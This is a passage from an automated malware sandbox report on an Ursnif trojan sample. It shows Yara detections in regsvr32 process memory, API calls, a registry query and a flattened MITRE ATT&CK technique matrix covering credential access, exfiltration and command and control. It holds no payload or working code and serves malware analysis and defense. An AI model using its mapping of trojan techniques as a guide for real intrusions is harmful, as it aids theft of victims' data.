            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E64177C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,3_2_6E64177C
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.1149110295.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1149197062.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1148486257.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1148805771.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1148976781.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1148674591.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1148901441.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1149054686.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 932, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.1149110295.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1149197062.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1148486257.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1148805771.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1148976781.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1148674591.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1148901441.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1149054686.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 932, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation31Winlogon Helper DLLProcess Injection12Masquerading11Credential DumpingSystem Time Discovery1Remote File Copy3Data from Local SystemData Encrypted1Standard Cryptographic Protocol12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Replication Through Removable MediaScripting121Port MonitorsAccessibility FeaturesVirtualization/Sandbox Evasion1Network SniffingVirtualization/Sandbox Evasion1Remote ServicesData from Removable MediaExfiltration Over Other Network MediumRemote File Copy3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            External Remote ServicesExploitation for Client Execution1Accessibility FeaturesPath InterceptionProcess Injection12Input CaptureProcess Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Non-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Drive-by CompromiseGraphical User Interface1System FirmwareDLL Search Order HijackingScripting121Credentials in FilesSecurity Software Discovery11Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol4SIM Card SwapPremium SMS Toll Fraud
            Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessFile Deletion1Account ManipulationRemote System Discovery1Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceObfuscated Files or Information2Brute ForceFile and Directory Discovery2Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
            Spearphishing AttachmentScriptingPath InterceptionScheduled TaskDLL Side-Loading1Two-Factor Authentication InterceptionSystem Information Discovery36Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.